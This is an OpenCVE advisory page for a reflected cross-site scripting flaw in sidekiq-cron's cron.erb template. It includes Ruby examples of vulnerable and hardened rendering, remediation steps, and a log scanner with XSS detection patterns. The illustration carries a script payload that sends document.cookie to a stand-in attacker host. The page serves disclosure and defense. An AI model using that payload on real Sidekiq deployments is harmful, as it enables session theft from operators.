Description
Sidekiq-cron through 2.3.1, an open-source scheduling add-on for Sidekiq, is vulnerable to cross-site scripting (XSS) via a crafted URL whose value is rendered, unescaped, by the cron.erb template.
Published: 2026-05-07
Score: n/a
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Sidekiq-cron through version 2.3.1 renders its cron jobs page (the tab it adds to the Sidekiq Web UI) from the cron.erb template, which, per the description, interpolates a value taken from the request URL into the HTML without escaping it. An attacker who can get a victim to open a crafted URL can therefore inject markup or JavaScript that executes in the victim's browser in the origin of the Sidekiq Web UI, whether or not that UI sits behind authentication. The injected script runs with whatever the victim has on that page: it can read session cookies that are not marked HttpOnly, perform actions in the web UI as the victim, or deface the interface, which can lead to account compromise or data theft.
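As an added illustration (not code from sidekiq-cron, whose vulnerable line the page does not show), the Ruby below builds the bug class described above: an ERB template that interpolates a request-derived URL unescaped, beside a hardened version that both HTML-escapes the value and restricts the href scheme, which is the fix the escaping recommendation under Remediation calls for. The route /sidekiq/cron, the return_to parameter, the templates and the attacker payload are all constructed for the example.

```ruby
require "erb"
require "cgi"
require "uri"

# Constructed illustration of the bug class described on this page. This is
# NOT sidekiq-cron's cron.erb; the route, the "return_to" parameter and the
# markup are assumptions made up for the example.
UNSAFE_TEMPLATE = %q{<a href="<%= url %>">Back to cron jobs</a>}

# Hardened form: the request-derived value is HTML-escaped before it is
# interpolated, and (see safe_href) its scheme is checked first, because
# escaping alone would still let href="javascript:..." through.
SAFE_TEMPLATE = %q{<a href="<%= ERB::Util.html_escape(url) %>">Back to cron jobs</a>}

DEFAULT_URL = "/sidekiq/cron"

# Pull one query parameter out of a request URI, URL-decoded, as Rack would.
def param_from_request(request_uri, name)
  query = URI.parse(request_uri).query
  return nil if query.nil?
  CGI.parse(query).fetch(name, []).first
end

# Allow only same-site paths (not protocol-relative "//host") or http(s) URLs;
# anything else falls back to the default link.
def safe_href(url)
  return DEFAULT_URL if url.nil? || url.empty?
  return url if url.start_with?("/") && !url.start_with?("//")
  parsed = URI.parse(url) rescue nil
  parsed && %w[http https].include?(parsed.scheme) ? url : DEFAULT_URL
end

# Vulnerable render: whatever came in the URL lands in the HTML verbatim.
def render_unsafe(request_uri)
  ERB.new(UNSAFE_TEMPLATE).result_with_hash(url: param_from_request(request_uri, "return_to"))
end

# Hardened render: scheme check, then HTML escaping inside the template.
def render_safe(request_uri)
  ERB.new(SAFE_TEMPLATE).result_with_hash(url: safe_href(param_from_request(request_uri, "return_to")))
end

def script_injected?(html)
  html.downcase.include?("<script")
end

# Constructed attacker URL: the payload closes the href attribute and the <a>
# tag, then injects script that ships document.cookie to an attacker host.
PAYLOAD = %q{"><script>location="https://attacker.example/?c="+document.cookie</script>}
ATTACK_URI = "/sidekiq/cron?return_to=#{CGI.escape(PAYLOAD)}"

if __FILE__ == $PROGRAM_NAME
  puts render_unsafe(ATTACK_URI)   # the <script> tag lands in the page
  puts render_safe(ATTACK_URI)     # rejected by the scheme check, escaped otherwise
end
```

The scheme check matters because html_escape only neutralises characters that break out of the attribute; a value like javascript:alert(1) contains none of them and would survive escaping intact.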

Affected Systems

The vulnerable product is Sidekiq-cron, an open-source scheduling add-on for the Sidekiq background job processor. All releases up to and including 2.3.1 contain the flaw. Any deployment that mounts the Sidekiq Web UI with the sidekiq-cron web extension loaded serves the page rendered from cron.erb and is therefore exposed; deployments that run sidekiq-cron without mounting the web UI do not expose the vulnerable template.

Risk and Exploitability

The weakness is classic cross-site scripting (CWE-79). Because exploitation requires a crafted URL to reach a user who then loads the Sidekiq Web UI page in a browser, the likelihood of real-world attacks is moderate; no EPSS score is available and the CVE is not listed in CISA's KEV catalog. The consequence is browser-side: theft of session material and actions performed in the web UI as the victim, not code execution on the Sidekiq host. A Sidekiq Web UI that is reachable from the internet, or mounted without authentication, raises the practical risk, since the attacker can confirm the injection point directly and target any operator who follows the link.

Generated by OpenCVE AI on May 7, 2026 at 15:37 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade sidekiq-cron to a release later than 2.3.1 as soon as the maintainers publish one that escapes the value rendered from cron.erb; at the time this page was generated no fixed version or advisory was recorded here, so check the project's changelog rather than assuming any particular later version is fixed.
  • If you vendor or override the sidekiq-cron web views, pass every request-derived value through ERB::Util.html_escape (or Rack::Utils.escape_html) before interpolating it, and validate the scheme of anything placed in an href, since HTML escaping alone does not stop javascript: URLs.
  • Restrict access to the Sidekiq Web UI, which is where the cron page lives, to authenticated and authorized administrators; Sidekiq::Web is a Rack application, so wrap it with Rack::Auth::Basic using a constant-time password comparison or mount it behind your application's admin session check, and do not expose it directly to the internet.
  • Review web-server access logs for requests to the Sidekiq Web UI whose query strings contain script tags, inline event handlers or javascript: URLs after URL decoding (scanners usually encode, and sometimes double-encode, their payloads), and review audit logs for cron jobs changed or enqueued outside normal change windows.
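An added example, not from OpenCVE or sidekiq-cron, of the log review the last item describes: it scans constructed combined-format access-log lines for requests under the Sidekiq Web UI mount whose URL-decoded query carries XSS markup, decoding repeatedly so double-encoded payloads are not missed. The /sidekiq mount point, the log lines and the IP addresses are assumptions made up for the example.

```ruby
require "cgi"

# Constructed access-log lines in combined log format. The hosts, IPs and the
# /sidekiq mount point are made up for this example and are not from the page.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [07/May/2026:15:37:01 +0000] "GET /sidekiq/cron HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  10.0.0.9 - - [07/May/2026:15:37:04 +0000] "GET /sidekiq/cron?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5211 "-" "curl/8.4.0"
  10.0.0.9 - - [07/May/2026:15:37:09 +0000] "GET /sidekiq/cron?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5190 "-" "curl/8.4.0"
  10.0.0.7 - - [07/May/2026:15:38:12 +0000] "GET /sidekiq/cron?poll=true HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  10.0.0.9 - - [07/May/2026:15:38:40 +0000] "GET /assets/app.js?v=javascript:alert(1) HTTP/1.1" 404 150 "-" "curl/8.4.0"
LOG

# Markup that has no business in a query string aimed at the cron page.
XSS_PATTERNS = [
  /<\s*script\b/i,
  /<\s*(img|svg|iframe|object|embed)\b/i,
  /\bon(error|load|mouseover|click|focus|animationstart)\s*=/i,
  /javascript\s*:/i,
].freeze

# URL-decode repeatedly (bounded) so %253C, a double-encoded "<", is caught.
def url_decode_fully(raw, max_rounds: 3)
  decoded = raw
  max_rounds.times do
    step = CGI.unescape(decoded)
    break if step == decoded
    decoded = step
  end
  decoded
end

Hit = Struct.new(:ip, :path, :pattern)

# Return one Hit per request under the mount point whose decoded path matches
# an XSS pattern. Requests outside the mount are ignored so the review stays
# focused on the vulnerable UI; pass mount: "/" to scan everything.
def scan_log(text, mount: "/sidekiq")
  text.each_line.filter_map do |line|
    m = line.match(/\A(?<ip>\S+) .*?"[A-Z]+ (?<path>\S+) HTTP\//)
    next unless m && m[:path].start_with?(mount)
    decoded = url_decode_fully(m[:path])
    pattern = XSS_PATTERNS.find { |re| decoded.match?(re) }
    pattern && Hit.new(m[:ip], decoded, pattern.source)
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |h| puts "#{h.ip} #{h.path} (#{h.pattern})" }
end
```

The third sample line is the reason for the bounded decode loop: a single CGI.unescape turns it back into the %3C form a naive grep for "<" would still miss. In production the same check belongs on the referer and user-agent fields too, since a stored or reflected payload can travel in either.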

Generated by OpenCVE AI on May 7, 2026 at 15:37 UTC.


Advisories

No advisories yet.

History

Thu, 07 May 2026 21:45:00 +0000

Type: First Time appeared
Values Added: Sidekiq-cron; Sidekiq-cron sidekiq-cron

Type: Vendors & Products
Values Added: Sidekiq-cron; Sidekiq-cron sidekiq-cron

Thu, 07 May 2026 16:00:00 +0000

Type: Title
Values Added: Cross-Site Scripting via Malicious URL Rendering in Sidekiq-cron

Type: Weaknesses
Values Added: CWE-79

Thu, 07 May 2026 14:30:00 +0000

Type: Description
Values Added: Sidekiq-cron thru 2.3.1, an open-source scheduling add-on for Sidekiq, is vulnerable to a cross-site scripting (xss) vulnerability via crafted URL being rended from cron.erb.

Type: References

MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-05-07T13:54:10.412Z

Reserved: 2025-12-08T00:00:00.000Z

Link: CVE-2025-67202

Vulnrichment

No data.

NVD

Status : Awaiting Analysis

Published: 2026-05-07T15:16:04.947

Modified: 2026-05-07T15:53:49.717

Link: CVE-2025-67202

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-07T21:25:17Z

Weaknesses